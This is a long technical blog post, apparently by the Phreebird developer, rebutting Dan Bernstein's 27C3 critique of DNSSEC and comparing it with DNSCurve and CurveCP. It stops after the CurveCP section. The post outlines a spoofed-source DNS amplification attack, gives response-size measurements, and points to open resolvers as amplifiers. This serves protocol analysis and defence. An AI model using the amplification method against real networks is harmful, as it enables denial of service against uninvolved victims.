Search Results

Keyword: ‘dns tunnel’

DNSSEC Interlude 2: DJB@CCC

January 5, 2011 24 comments

Short Version: Dan Bernstein delivered a talk at the 27C3 about DNSSEC and his vision for authenticating and encrypting the net. While it is gratifying to see such consensus regarding both the need to fix authentication and encryption, and the usefulness of DNS to implement such a fix, much of his representation of DNSSEC — and his own replacement, DNSCurve — was plainly inaccurate. He attacks a straw man implementation of DNSSEC that must sign records offline, despite all major DNSSEC servers moving to deep automation to eliminate administrator errors, and despite the existence of Phreebird, my online DNSSEC signing proxy specifically designed to avoid the faults he identifies.

DJB complains about NSEC3’s impact on the privacy of domain names, despite the notably weak privacy guarantees on public DNS names themselves, and more importantly, the code in Phreebird that dynamically generates NSEC3 records thus completely defeating GPU hashcracking. He complains about DNSSEC as a DDoS bandwidth amplifier, while failing to mention that the amplification issues are inherited from DNS. I observe his own site, cr.yp.to, to be a 6.4x bandwidth amplifier, and the worldwide network of open recursive servers to be infinitely more exploitable even without DNSSEC. DJB appeared unaware that DNSSEC could be leveraged to offer end to end semantics, or that constructions existed to use secure offline records to authenticate protocols like HTTPS. I discuss implementations of both in Phreebird.

From here, I analyze Curve25519, and find it a remarkably interesting technology with advantages in size and security. His claims regarding instantaneous operation are a bit of an exaggeration though; initial benchmarking puts Curve25519 at about 4-8x the speed of RSA1024. I discuss the impact of DNSCurve on authoritative servers, which DJB claims to be a mere 1.15x increase in traffic. I present data from a wide variety of sources, including the 27C3 network, demonstrating that double and even triple digit traffic increases are in fact likely, particularly to TLDs. I also observe that DNSCurve has unavoidable effects on query latency, server CPU and memory, and key risk management. The argument that DNSSEC doesn’t sign enough, because a signature on .org doesn’t necessary sign all of wikipedia.org, is shown to be specious, in that any delegated namespace with unsigned children (including in particular DNSCurve) must have this characteristic.

I move on to discussing end to end protocols. CurveCP is seen as interesting and highly useful, particularly if it integrates a lossy mode. However, DJB states that CurveCP will succeed where HTTPS has failed because CurveCP’s cryptographic primitive (Curve25519) is faster. Google is cited as an organization that has not been able to deploy HTTPS because the protocol is too slow. Actual source material from Google is cited, directly refuting DJB’s assertion. It is speculated that the likely cause of Google’s sudden deployment of HTTPS on GMail was an attack by a foreign power, given that the change was deployed 24 hours after disclosure of the attack. Other causes for HTTPS’s relative rarity are cited, including the large set of servers that need to be simultaneously converted, the continuing inability to use HTTPS for virtual hosted sites, and the need for interaction with third party CA’s.

We then proceed to explore DJB’s model for key management. Although DJB has a complex system in DNSCurve for delegated key management, he finds himself unable to trust either the root or TLDs. Without these trusted third parties, his proposal devolves to the use of “Nym” URLs like http://Z0z9dTWfhtGbQ4RoZ08e62lfUA5Db6Vk3Po3pP9Z8tM.twitter.com to bootstrap key acquisition for Twitter. He suggests that perhaps we can continue to use at least the TLDs to determine IP addresses, as long as we integrate with an as-yet unknown P2P DNS system as well.

I observe this is essentially a walk of Zooko’s Triangle, and does not represent an effective or credible solution to what we’ve learned is the hardest problem at the intersection of security and cryptography: Key Management. I conclude by pointing out that DNSSEC does indeed contain a coherent, viable approach to key management across organizational boundaries, while this talk — alas — does not.


So, there was a talk at the 27th Chaos Communication Congress about DNSSEC after all!  Turns out Dan Bernstein, better known as DJB, is not a fan.

That’s tragic, because I’m fairly convinced he could do some fairly epic things with the technology.

Before I discuss the talk, there are three things I’d like to point out.  First, you should see the talk!  It’s actually a pretty good summary of a lot of latent assumptions that have been swirling around DNSSEC for years — assumptions, by the way, that have been held as much by defenders as detractors.  Here are links:

Video
Slides

Second, I have a tremendous amount of respect for Dan Bernstein.  It was his fix to the DNS that I spent six months pushing, to the exclusion of a bunch of other fixes which (to be gentle) weren’t going to work.  DJB is an excellent cryptographer.

And, man, I’ve been waiting my entire career for Curve25519 to come out.

But security is bigger than cryptography.

The third thing I’d like to point out is that, with DJB’s talk, a somewhat surprising consensus has taken hold between myself, IETF WG’s, and DJB.  Essentially, we all agree that:

1) Authentication and encryption on the Internet is broken,
2) Fixing both would be a Big Deal,
3) DNS is how we’re going to pull this off.

Look, we might disagree about the finer details, but that’s a fairly incredible amount of consensus across the engineering spectrum:  There’s a problem.  We have to fix it.  We know what we’re going to use to fix it.

That all identified, lets discuss the facts.

Section Index

Well, this document got a bit larger than expected (understatement), so here’s a list of section headings.

DNSSEC’s Problem With Key Rotation Has Been Automated Away
DNSSEC Is Not Necessarily An Offline Signer — In Fact, It Works Better Online!
DNS Leaks Names Even Without NSEC3 Hashes
NSEC3 “White Lies” Entirely Eliminate The NSEC3 Leaking Problem
DNSSEC Amplification is not a DNSSEC bug, but an already existing DNS, UDP, and IP Bug
DNSSEC Does In Fact Offer End To End Resolver Validation — Today
DNSSEC Bootstraps Key Material For Protocols That Desperately Need It — Today
Curve25519 Is Actually Pretty Cool
Limitations of Curve25519
DNSCurve Destroys The Caching Layer.  This Matters.
DNSCurve requires the TLDs to use online signing
DNSCurve increases query latency
DNSCurve Also Can’t Sign For Its Delegations
What About CurveCP?
HTTPS Has 99 Problems But Speed Ain’t One
There Is No “On Switch” For HTTPS
HTTPS Certificate Management Is Still A Problem!
The Biggest Problem:  Zooko’s Triangle
The Bottom Line:  It Really Is All About Key Management


DNSSEC’s Problem With Key Rotation Has Been Automated Away

From slide 48 to slide 53, DJB discusses what would appear to be a core limitation of DNSSEC:  Its use of offline signing.  According to the traditional model for DNSSEC, keys are kept in a vault offline, only pulled out during those rare moments where a zone must change or be resigned.  He observes a host of negative side effects, including an inability to manage dynamic domains, increased memory load from larger zones, and difficulties manually rotating signatures and keys.

But these are not limitations to DNSSEC as a protocol.  They’re implementation artifacts, no more inherent to DNSSEC than publicfile‘s inability to support PHP.  (Web servers were not originally designed to support dynamic content, the occasional cgi-bin notwithstanding.  So, we wrote better web servers!)  Key rotation is the source of some enormous portion of DNSSEC’s historical deployment complexity, and as such pretty much every implementation has automated it — even at the cost of having the “key in a vault”. See production-ready systems by:

  1. BIND 9.7 — “DNSSEC For Humans”
  2. OpenDNSSEC
  3. Xelerance
  4. Secure64
  5. InfoBlox
  6. Verisign

So, on a purely factual basis, the implication that DNSSEC creates a “administrative disaster” under conditions of frequent resigning is false.  Everybody’s automating.  Everybody. But his point that offline signing is problematic for datasets that change with any degree of frequency is in fact quite accurate.

But who says DNSSEC needs to be an offline signer, signing all its records in advance?


DNSSEC Is Not Necessarily An Offline Signer — In Fact, It Works Better Online!

Online signing has long been an “ugly duckling” of DNSSEC.  In online signing, requests are signed “on demand” — the keys are pulled out right when the response is generated, and the appropriate imprimatur is applied.  While this seems scary, keep in mind this is how SSL, SSH, IPSec, and most other crypto protocols function.  DJB’s own DNSCurve is an online signer.

PGP/GPG are not online signers.  They have dramatic scalability problems, as nobody says aloud but we all know.  (To the extent they will be made scalable, they will most likely be retrieving and refreshing key material via DNSSEC.)

Online signing has history with DNSSEC.  RFC4470 and RFC4471 discuss the precise ways and means online signing can integrate with the original DNSSEC.  Bert Hubert’s been working on PowerDNSSEC for some time, which directly integrates online signing into very large scale hosting.

And then there’s Phreebird.  Phreebird is my DNSSEC proxy; I’ve been working on it for some time.  Phreebird is an online signer that operates, “bump in the wire” style, in front of existing DNS infrastructure.  (This should seem familiar; it’s the deployment model suggested by DJB for DNSCurve.)  Got a dynamic signer, that changes up responses according to time of day, load, geolocation, or the color of its mood ring?  I’ve been handling that for months.  Worried about unpredictable requests?  Phreebird isn’t, it signs whatever responses go by.  If new responses are sent, new signatures will be generated.  Concerned about preloading large zones?  Don’t be, Phreebird’s cache can be as big or as little as you want it to be.  It preloads nothing.

As for key and signature rotation, Phreebird can be trivially modified to sign everything with a 5 minute signature — in case you’re particularly concerned with replay.  Online signing really does make things easier.


DNS Leaks Names Even Without NSEC3 Hashes

Phreebird can also deal with NSEC3’s “leaking”.  Actually, it does so by default.

In the beginning, DNSSEC’s developers realized they needed a feature called Authoritative Nonexistence — a way of saying, “The record you are looking for does not exist, and I can prove it”.  This posed a problem.  While there are a usually a finite number of names that do exist, the number of non-existent names is effectively infinite.  Unique proofs of nonexistence couldn’t be generated for all of them, but the designers really wanted to prevent requiring online signing.  (Just because we can sign online, doesn’t mean we should have to sign online.)  So they said they’d sign ranges — say there were no names between Alice and Bob, and Bob and Charlie, and Charlie and David.

This wasn’t exactly appreciated by Alice, Bob, Charlie, and David — or, at least, the registries that held their domains.  So, instead, Alice, Bob, Charlie, and David’s names were all hashed — and then the statement became, there are no names between H1 (the hash of Charlie) and H2 (the hash of Alice).  That, in a nutshell, is NSEC3.

DJB observes, correctly, that there’s only so much value one gets from hashing names.  He quotes Ruben Niederhagen at being able to crack through 1.7 Trillion names a day, for example.

This is imposing, until one realizes that at 1000 queries a second, an attacker can sweep a TLD through about 864,000,000 queries a day.  Granted:  This is not as fast, but it’s much faster than your stock SSHD brute force, and we see substantial evidence of those all the time.

Consider: Back in 2009, DJB used hashcracking to answer Frederico Neves’ challenge to find domains inside of sec3.br. You can read about this here. DJB stepped up to the challenge, and the domains he (and Tanja Lange) found were:

douglas, pegasus, rafael, security, unbound, while42, zz–zz

It does not take 1.7T hashcracks to find these names. It doesn’t even take 864M. Domain names are many things; compliant with password policies is not one of them. Ultimately, the problem with assuming privacy in DNS names is that they’re being published openly to the Internet.  What we have here is not a bright line differential, but a matter of degree.

If you want your names completely secret, you have to put them behind the split horizon of a corporate firewall — as many people do.  Most CorpNet DNS is private.


NSEC3 “White Lies” Entirely Eliminate The NSEC3 Leaking Problem

However, suppose you want the best of both worlds:  Secret names, that are globally valid (at the accepted cost of online brute-forceability).  Phreebird has you taken care of — by generating what can be referred to as NSEC3 White Lies.  H1 — the hash of Charlie — is a number.  It’s perfectly valid to say:

There are no records with a hash between H1-1 and H1+1.

Since there’s only one number between x-1 and x+1 — X, or in this case, the hash of Charlie — authoritative nonexistence is validated, without leaking the actual hash after H1.


DNSSEC Amplification is not a DNSSEC bug, but an already existing DNS, UDP, and IP Bug

Probably the most quoted comment of DJB was the following:

“So what does this mean for distributed denial of service amplification, which is the main function of DNSSEC”

Generally, what he’s referring to is that an attacker can:

  1. Spoof the source of a DNSSEC query as some victim target (32 byte packet + 8 byte UDP header + 20 byte IP header = 60 byte header, raised to 64 byte due to Minimum Transmission Unit)
  2. Make a request that returns a lot of data (say, 2K, creating a 32x amplification)
  3. GOTO 1

It’s not exactly a complicated attack.  However, it’s not a new attack either.  Here’s a SANS entry from 2009, discussing attacks going back to 2006.  Multi gigabit floods bounced off of DNS servers aren’t some terrifying thing from the future; they’re just part of the headache that is actively managing an Internet with ***holes in it.

There is an interesting game, one that I’ll definitely be writing about later, called “Whose bug is it anyway?”.  It’s easy to blame DNSSEC, but there’s a lot of context to consider.

Ultimately, the bug is IP’s, since IP (unlike many other protocols) allows long distance transit of data without a server explicitly agreeing to receive it.  IP effectively trusts its applications to “play nice” — shockingly, this was designed in the 80’s.  UDP inherits the flaw, since it’s just a thin application wrapper around IP.

But the actual fault lies in DNS itself, as the amplification actually begins in earnest under the realm of simple unencrypted DNS queries. During the last batch of gigabit floods, the root servers were used — their returned values were 330 bytes out for every 64 byte packet in.  Consider though the following completely randomly chosen query:

# dig +trace cr.yp.to any
cr.yp.to. 600 IN MX 0 a.mx.cr.yp.to.
cr.yp.to. 600 IN MX 10 b.mx.cr.yp.to.
cr.yp.to. 600 IN A 80.101.159.118
yp.to. 259200 IN NS a.ns.yp.to.
yp.to. 259200 IN NS uz5uu2c7j228ujjccp3ustnfmr4pgcg5ylvt16kmd0qzw7bbjgd5xq.ns.yp.to.
yp.to. 259200 IN NS b.ns.yp.to.
yp.to. 259200 IN NS f.ns.yp.to.
yp.to. 259200 IN NS uz5ftd8vckduy37du64bptk56gb8fg91mm33746r7hfwms2b58zrbv.ns.yp.to.
;; Received 414 bytes from 131.193.36.24#53(f.ns.yp.to) in 32 ms

So, the main function of Dan Bernstein’s website is to provide a 6.4x multiple to all DDoS attacks, I suppose?

I keed, I keed.  Actually, the important takeaway is that practically every authoritative server on the Internet provides a not-insubstantial amount of amplification.  Taking the top 1000 QuantCast names (minus the .gov stuff, just trust me, they’re their own universe of uber-weird; I wouldn’t judge X.509 on the Federal Bridge CA), we see:

  • An average ANY query returns 413.9 bytes (seriously!)
  • Almost half (460) return 413 bytes or more

So, the question then is not “what is the absolute amplification factor caused by DNSSEC”, it’s “What is the amplification factor caused by DNSSEC relative to DNS?”

It’s ain’t 90x, I can tell you that much.  Here is a query for http://www.pir.org ANY, without DNSSEC:

http://www.pir.org. 300 IN A 173.201.238.128
pir.org. 300 IN NS ns1.sea1.afilias-nst.info.
pir.org. 300 IN NS ns1.mia1.afilias-nst.info.
pir.org. 300 IN NS ns1.ams1.afilias-nst.info.
pir.org. 300 IN NS ns1.yyz1.afilias-nst.info.
;; Received 329 bytes from 199.19.50.79#53(ns1.sea1.afilias-nst.info) in 90 ms

And here is the same query, with DNSSEC:

http://www.pir.org. 300 IN A 173.201.238.128
http://www.pir.org. 300 IN RRSIG A 5 3 300 20110118085021 20110104085021 61847 pir.org. n5cv0V0GeWDPfrz4K/CzH9uzMGoPnzEr7MuxPuLUxwrek+922xiS3BJG NfcM9nlbM5GZ5+UPGv668NJ1dx6oKxH8SlR+x3d8gvw2DHdA51Ke3Rjn z+P595ZPB67D9Gh6l61itZOJexwsVNX4CYt6CXTSOhX/1nKzU80PVjiM wg0=
pir.org. 300 IN NS ns1.mia1.afilias-nst.info.
pir.org. 300 IN NS ns1.yyz1.afilias-nst.info.
pir.org. 300 IN NS ns1.ams1.afilias-nst.info.
pir.org. 300 IN NS ns1.sea1.afilias-nst.info.
pir.org. 300 IN RRSIG NS 5 2 300 20110118085021 20110104085021 61847 pir.org. IIn3FUnmotgv6ygxBM8R3IsVv4jShN71j6DLEGxWJzVWQ6xbs5SIS0oL OA1ym3aQ4Y7wWZZIXpFK+/Z+Jnd8OXFsFyLo1yacjTylD94/54h11Irb fydAyESbEqxUBzKILMOhvoAtTJy1gi8ZGezMp1+M4L+RvqfGze+XFAHN N/U=
;; Received 674 bytes from 199.19.49.79#53(ns1.yyz1.afilias-nst.info) in 26 ms

About a 2x increase. Not perfect, but not world ending. Importantly, it’s nowhere close to the actual problem:

Open recursors.

DNS comes from 1983, when the load of running around the Internet mapping names to numbers was actually fairly high. As such, it acquired a caching layer — a horde of BIND, Nominum, Unbound, MSDNS, PowerDNS, and other servers that acted as a middle layer between the masses of clients and the authoritative servers of the Internet.

At any given point, there’s between three and twelve million IP addresses on the Internet that operate as caching resolvers, and will receive requests from and send arbitrary records to any IP on the Internet.

Arbitrary attacker controlled records.

;; Query time: 5 msec
;; SERVER: 4.2.2.1#53(4.2.2.1)
;; WHEN: Tue Jan 4 11:10:59 2011
;; MSG SIZE rcvd: 3641

That’s a 3.6KB response to a 64 byte request, no DNSSEC required. I’ve been saying this for a while: DNSSEC is just DNS with signatures. Whose bug is it anyway? Well, at least some of those servers are running DJB’s dnscache…

So, what do we do about this? One option is to attempt further engineering: There are interesting tricks that can be run with ICMP to detect the flooding of an unwilling target. We could also have a RBL — realtime blackhole list — of IP addresses that are under attack. This would get around the fact that this attack is trivially distributable.

Another approach is to require connections that appear “sketchy” to upgrade to TCP.  There’s support in DNS for this — the TC bit — and it’s been deployed with moderate success by at least one major DNS vendor.  There’s some open questions regarding the performance of TCP in DNS, but there’s no question that kernels nowadays are at least capable of being much faster.

It’s an open question what to do here.

Meanwhile, the attackers chuckle. As DJB himself points out, they’ve got access to 2**23 machines — and these aren’t systems that are limited to speaking random obscure dialects of DNS that can be blocked anywhere on path with a simple pattern matching filter. These are actual desktops, with full TCP stacks, that can join IRC channels and be told to flood the financial site of the hour, right down to the URL!

If you’re curious why we haven’t seen more DNS floods, it might just be because HTTP floods work a heck of a lot better.


DNSSEC Does In Fact Offer End To End Resolver Validation — Today

On Slide 36, DJB claims the following is possible:

Bob views Alice’s web page on his Android phone. Phone asked hotel DNS cache for web server’s address. Eve forged the DNS response! DNS cache checked DNSSEC but the phone didn’t.

This is true as per the old model of DNSSEC, which inherits a little too much from DNS. As per the old model, the only nodes that participate in record validation are full-on DNS servers. Clients, if they happen to be curious whether a name was securely resolved, have to simply trust the “AD” bit attached to a response.

I think I can speak for the entire security community when I say: Aw, hell no.

The correct model of DNSSEC is to push enough of the key material to the client, that it can make its own decisions. (If a client has enough power to run TLS, it has enough power to validate a DNSSEC chain.) In my Domain Key Infrastructure talk, I discuss four ways this can be done. But more importantly, in Phreebird I actually released mechanisms for two of them — chasing, where you start at the bottom of a name and work your way up, and tracing, where you start at the root and work your way down.

Chasing works quite well, and importantly, leverages the local cache. Here is Phreebird’s output from a basic chase command:

        |---www.pir.org. (A)
            |---pir.org. (DNSKEY keytag: 61847 alg: 5 flags: 256)
                |---pir.org. (DNSKEY keytag: 54135 alg: 5 flags: 257)
                |---pir.org. (DS keytag: 54135 digest type: 2)
                |   |---org. (DNSKEY keytag: 1743 alg: 7 flags: 256)
                |       |---org. (DNSKEY keytag: 21366 alg: 7 flags: 257)
                |       |---org. (DS keytag: 21366 digest type: 2)
                |       |   |---. (DNSKEY keytag: 21639 alg: 8 flags: 256)
                |       |       |---. (DNSKEY keytag: 19036 alg: 8 flags: 257)
                |       |---org. (DS keytag: 21366 digest type: 1)
                |           |---. (DNSKEY keytag: 21639 alg: 8 flags: 256)
                |               |---. (DNSKEY keytag: 19036 alg: 8 flags: 257)
                |---pir.org. (DS keytag: 54135 digest type: 1)
                    |---org. (DNSKEY keytag: 1743 alg: 7 flags: 256)
                        |---org. (DNSKEY keytag: 21366 alg: 7 flags: 257)
                        |---org. (DS keytag: 21366 digest type: 2)
                        |   |---. (DNSKEY keytag: 21639 alg: 8 flags: 256)
                        |       |---. (DNSKEY keytag: 19036 alg: 8 flags: 257)
                        |---org. (DS keytag: 21366 digest type: 1)
                            |---. (DNSKEY keytag: 21639 alg: 8 flags: 256)
                                |---. (DNSKEY keytag: 19036 alg: 8 flags: 257)

Chasing isn’t perfect — one of the things Paul Vixie and I have been talking about is what I refer to as SuperChase, encoded by setting both CD=1 (Checking Disabled) and RD=1 (Recursion Desired). Effectively, there are a decent number of records between http://www.pir.org and the root. With the advent of sites like OpenDNS and Google DNS, that might represent a decent number of round trips. As a performance optimization, it would be good to eliminate those round trips, by allowing a client to say “please fill your response with as many packets as possible, so I can minimize the number of requests I need to make”.

But the idea that anybody is going to use a DNSSEC client stack that doesn’t provide end to end semantics is unimaginable. After all, we’re going to be bootstrapping key material with this.


DNSSEC Bootstraps Key Material For Protocols That Desperately Need It — Today

On page 44, DJB claims that because DNSSEC uses offline signing, the only way it could be used to secure web pages is if those pages were signed with PGP.

What? There’s something like three independent efforts to use DNSSEC to authenticate HTTPS sessions.

Leaving alone the fact that DNSSEC isn’t necessarily an offline signer, it is one of the core constructions in cryptography to intermix an authenticator with otherwise-anonymous encryption to defeat an otherwise trivial man in the middle attack. That authenticator can be almost anything — a password, a private key, even a stored secret from a previous interaction. But this is a trivial, basic construction. It’s how EDH (Ephemeral Diffie-Helman) works!

Using keys stored in DNS has been attempted for years. Some mechanisms that come to mind:

  • SSHFP — SSH Fingerprints in DNS
  • CERT — Certificates in DNS
  • DKIM — Domain Keys in DNS

All of these have come under withering criticism from the security community, because how can you possibly trust what you get back from these DNS lookups?

With DNSSEC — even with offline-signed DNSSEC — you can. And in fact, that’s been the constant refrain: “We’ll do this now, and eventually DNSSEC will make it safe.” Intermixing offline signers with online signers is perfectly “legal” — it’s isomorphic to receiving a password in a PGP encrypted email, or sending your SSH public key to somebody via PGP.

So, what I’m shipping today is simple:

http://www.hospital-link.org IN TXT “v=key1 ha=sha1 h=f1d2d2f924e986ac86fdf7b36c94bcdf32beec15″

That’s an offline-signable blob, and it says “If you use HTTPS to connect to http://www.hospital-link.org, you will be given a certificate with the SHA1 hash of f1d2d2f924e986ac86fdf7b36c94bcdf32beec15”. As long as the ground truth in this blob can be chained to the DNS root, by the client and not some random name server in a coffee shop, all is well (to the extent SHA-1 is safe, anyway).

This is not an obscure process. This is a basic construction. Sure, there are questions to be answered, with a number of us fighting over the precise schema. And that’s OK! Let the best code win.

So why isn’t the best code DNSCurve?


Curve25519 Is Actually Pretty Cool

DNSCurve is based on something totally awesome:  Curve25519.  I am not exaggerating when I say, this is something I’ve wanted from the first time I showed up in Singapore for Black Hat Asia, 9 years ago (you can see vague references to it in the man page for lc).  Curve25519 essentially lets you do this:

If I have a 32 byte key, and you have a 32 byte key, and we both know eachother’s key, we can mix them to create a 32 byte secret.

32 bytes is very small.

What’s more, Curve25519 is fast(er).  Here’s comparative benchmarks from a couple of systems:

SYSTEM 1 (Intel Laptop, Cygwin, curve25519-20050915 from DJB):

RSA1024 OpenSSL sign/s:  520.2
RSA1024 OpenSSL verify/s:  10874.0
Curve25519 operations/s:  4131

SYSTEM 2 (Amazon Small VM, curve25519-20050915):

RSA1024 OpenSSL sign/s:  502.6
RSA1024 OpenSSL verify/s:  11689.8
Curve25519 operations/s:  507.25

SYSTEM 3 (Amazon XLarge VM, using AGL’s code here for 64 bit compliance):

RSA1024 OpenSSL sign/s:  1048.4
RSA1024 OpenSSL verify/s:  19695.4
Curve25519 operations/s:  4922.71

While these numbers are a little lower than I remember them — for some reason, I remember 16K/sec — they’re in line with DJB’s comments here:  500M clients a day is about 5787 new sessions a second.  So generally, Curve25519 is about 4 to 8 times faster than RSA1024.

It’s worth noting that, while 4x-8x is significant today, it won’t be within a year or two.  That’s because by then we’ll have RSA acceleration via GPU.  Consider this tech report — with 128 cores, they were able to achieve over 5000 RSA1024 decryption operations per second.  Modern NVIDIA cards have over 512 cores, with across the board memory and frequency increases.   That would put RSA speed quite a bit beyond software Curve25519.  Board cost?  $500.

That being said, Curve25519 is quite secure.  Even with me bumping RSA up to 1280bit in Phreebird by default, I don’t know if I reach the putative level of security in this ECC variant.


Limitations of Curve25519

The most exciting aspect of Curve25519 is its ability to, with relatively little protocol overhead, create secure links between two peers.  The biggest problem with Curve25519 is that it seems to get its performance by sacrificing the capacity to sign once and distribute a message to many parties.  This is something we’ve been able to do with pretty much every asymmetric primitive thus far — RSA, DH (via DSA), ECC (via ECDSA), etc.  I don’t know whether DJB’s intent is to enforce a particular use pattern, or if this is an actual technical limitation.  Either way, Alice can’t sign a message and hand it to Bob, and have Bob prove to Charlie that he received that message from Alice.


DNSCurve Destroys The Caching Layer.  This Matters.

In DNSCurve, all requests are unique — they’re basically cryptographic blobs encapsulated in DNS names, sent directly to target name servers or tunneled through local servers, where they are uncacheable due to their uniqueness.  (Much to my amusement and appreciation, the DNSCurve guys realized the same thing I did — gotta tunnel through TXT if you want to survive.) So one hundred thousand different users at the same ISP, all looking up the same http://www.cnn.com address, end up issuing unique requests that make their way all the way to CNN’s authoritative servers.

Under the status quo, and under DNSSEC, all those requests would never leave the ISP, and would simply be serviced locally.

It was ultimately this characteristic of DNSCurve, above all others, that caused me to reject the protocol in favor of DNSSEC.  It was my estimation that this would cause something like a 100x increase in load on authoritative name servers.

DJB claims to have measured the effect of disabling caching at the ISP layer, and says the increase is little more than 15%, or 1.15x. He declares my speculation, “wild”. OK, that’s fine, I like being challenged!  Lets take a closer look.

All caches have a characteristic known as the hit rate.  For every query that comes in, what’s the chances that it will require a lookup to a remote authoritative server, vs. being servicable from the cache?  A hit rate of 50% would imply a 2x increase in load.  75% would imply 4x.  87.5%?  8x.

Inverting the math, for the load differential to be just 15%, that would mean only about 6% of queries were being hosted from local cache.  Do we, in fact, see a 6% hitrate?  Lets see what actual operations people say about their name servers:

In percentages is dat 80 tot 85% hits…Daar kom je ook iets boven de 80%.
XS4ALL, a major Dutch ISP (80-85% numbers)

I’ve attached a short report from a couple of POP’s at a mid-sized (3-4 M subs) ISP.  It’s just showing a couple of hours from earlier this fall (I kind of chose it at random).

It’s extremely consistent across a number of different sites that I checked (not the 93%, but 85-90% cache hits): 0.93028, 0.92592, 0.93094, 0.93061, 0.92741
–Major DNS supplier

I don’t have precise cache hit rates for you, but I can give you this little fun tidbit. If you have a 2-tier cache, and the first tier is tiny (only a couple hundred entries), then you’ll handle close to 50% of the
queries with the first cache…

Actually, those #s are old. We’re now running a few K first cache, and have a 70%+ hit rate there.
–Major North American ISP

So, essentially, unfiltered consensus hitrate is about 80-90%, which puts the load increase at 5x-10x in general.  Quite a bit less than the 100x I was worried about, right?  Well, lets look at one last dataset:

Dec 27 03:30:25 solaria pdns_recursor[26436]: stats: 11133 packet cache entries, 99% packet cache hits
Dec 27 04:00:26 solaria pdns_recursor[26436]: stats: 17884 packet cache entries, 99% packet cache hits
Dec 27 04:30:28 solaria pdns_recursor[26436]: stats: 22522 packet cache entries, 99% packet cache hits
–Network at 27th Chaos Communication Congress

Well, there’s our 100x numbers. At least (possibly more than) 99% of requests to 27C3’s most popular name server were hosted out of cache, rather than spawning an authoritative lookup.

Of course, it’s interesting to know what’s going on.  This  quote comes from an enormous supplier of DNS resolutions.

Facebook loads resources from dynamically (seemingly) created subdomains. I’d guess for alexa top 10,000 hit rate is 95% or more. But for other popular domains like Facebook, absent a very large cache, hit rate will be exceptionally low. And if you don’t descriminate cache policy by zone, RBLs will eat your entire cache, moving hit rate very very low.
–Absolutely Enormous Resolution Supplier

Here’s where it becomes clear that there are domains that choose to evade caching — they’ve intentionally engineered their systems to emit low TTLs and/or randomized names, so that requestors can get the most up to date records. That’s fine, but those very nodes are directly impacting the hitrate — meaning your average authoritative is really being saved even more load by the existence of the DNS caching layer.

It gets worse: As Paul Wouters points out, there is not a 1-to-1 relationship between cache misses and further queries. He writes:

You’re forgetting the chain reaction. If there is a cache miss, the server has to do much more then 1 query. It has to lookup NS records, A records, perhaps from parents (perhaps cached) etc. One cache miss does not equal one missed cache hit!

To the infrastructure, every local endpoint cache hit means saving a handful of lookups.

That 99% cache hit rate looks even worse now. Looking at the data, 100x or even 200x doesn’t seem quite so wild, at least compared to the fairly obviously incorrect estimation of 1.15x.

Actually, when you get down to it, the greatest recipients of traffic boost are going to be nodes with a large number of popular domains that are on high TTLs, because those are precisely what:

a) Get resolved by multiple parties, and
b) Stay in cache, suppression further resolution

Yeah, so that looks an awful lot like records hosted at the TLDs. Somehow I don’t think they’re going to deploy DNSCurve anytime soon.

(And for the record, I’m working on figuring out the exact impact of DNSCurve on each of the TLDs. After all, data beats speculation.)

[UPDATE: DJB challenges this section, citing local caching effects. More info here.]


DNSCurve requires the TLDs to use online signing

DNSSEC lets you choose:  Online signing, with its ease of use and extreme flexibility.  Or offline signing, with the ability to keep keying material in very safe places.

A while back, I had the pleasure of being educated in the finer points of DNS key risk management, by Robert Seastrom of Afilias (they run .org).  Lets just say there are places you want to be able to distribute DNS traffic, without actually having “the keys to the kingdom” physically deployed.  As Paul Wouters observed:

Do you know how many instances of rootservers there are? Do you really want that key to live in 250+ places at once? Hell no!

DNSSEC lets you choose how widely to distribute your key material.  DNSCurve does not.


DNSCurve, even with Curve25519, has some CPU/Memory Performance Issues

Yes, Curve25519 is fast.  But nothing in computers is “instantaneous”, as DJB repeatedly insisted Curve25519 is at 27C3.  A node that’s doing 5500 Curve25519 operations a second is likely capable of 50,000 to 100,000 DNS queries per second.  We’re basically eating 5 to 10 qps per Curve25519 op — which makes sense, really, since no asymmetric crypto is ever going to be as easy as burping something out on the wire.

DJB gets around this by presuming large scale caching.  But while DNSSEC can cache by record — with cache effectiveness at around 70% for just a few thousand entries, according to the field data — DNSCurve has to cache by session.  Each peer needs to retain a key, and the key must be looked up.

Random lookups into a 500M-record database (as DJB cites for .com), on the required millisecond scale, aren’t actually all that easy.  Not impossible, of course, but messy.


DNSCurve increases query latency

This is unavoidable.  Caches allow entire trust chains to be aggregated on network links near users.  Even though DNSSEC hasn’t yet built out a mechanism for a client to retrieve that chain in a single query, there’s nothing stopping us on a protocol level from really leveraging local caches.

DNSCurve can never use these local caches.  Every query must round-trip between the host and each foreign server in the resolution chain — at least, if end to end trust is to be maintained.

(In the interest of fairness, there are modes of validating DNSSEC on endpoints that bypass local caches entirely and go straight to the root. Unbound, or libunbound as used in Phreebird, will do this by default. It’s important that the DNSSEC community be careful about this, or we’ll have the same fault I’m pointing out in DNSCurve.)


DNSCurve Also Can’t Sign For Its Delegations
If there’s one truly strange argument in DJB’s presentation, it’s on Page 39. Here, he complains that in DNSSEC, .org being signed doesn’t sign all the records underneath .org, like wikipedia.org.

Huh? Wikipedia.org is a delegation, an unsigned one at that. That means the only information that .org can sign is either:

1) Information regarding the next key to be used to sign wikipedia.org records, along with the next name server to talk to.
2) Proof there is no next key, and Wikipedia’s records are unsigned

That’s it. Those are the only choices, because Wikipedia’s IP addresses are not actually hosted by the .org server. DNSCurve either implements the exact same thing, or it’s totally undeployable, because without support for unsigned delegations 100% of your children must be signed in order for you to be signed. I can’t imagine DNSCurve has that limitation.


What About CurveCP?

I don’t hate CurveCP.  In fact, if there isn’t a CurveCP implementation out within a month, I’ll probably write one myself.  If I’ve got one complaint about what I’ve heard about it, it’s that it doesn’t have a lossy mode (trickier than you think — replay protection etc).

CurveCP is seemingly an IPsec clone, over which a TCP clone runs.  That’s not actually accurate.  See, our inability to do small and fast asymmetric cryptography has forced us to do all these strange things to IP, making stateful connections even when we just wanted to fire and forget a packet.  With CurveCP, if you know who you’re sending to, you can just fire and forget packets — the overhead, both in terms of effect on CPU and bandwidth, is actually quite affordable.

This is what I wanted for linkcat almost a decade ago!  There are some beautiful networking protocols that could be made with Curve25519.  CurveCP is but one.  The fact that CurveCP would run entirely in userspace is a bonus — controversial as this may be, the data suggests kernel bound APIs (like IPsec) have a lot more trouble in the field than usermode APIs (like TLS/HTTPS).

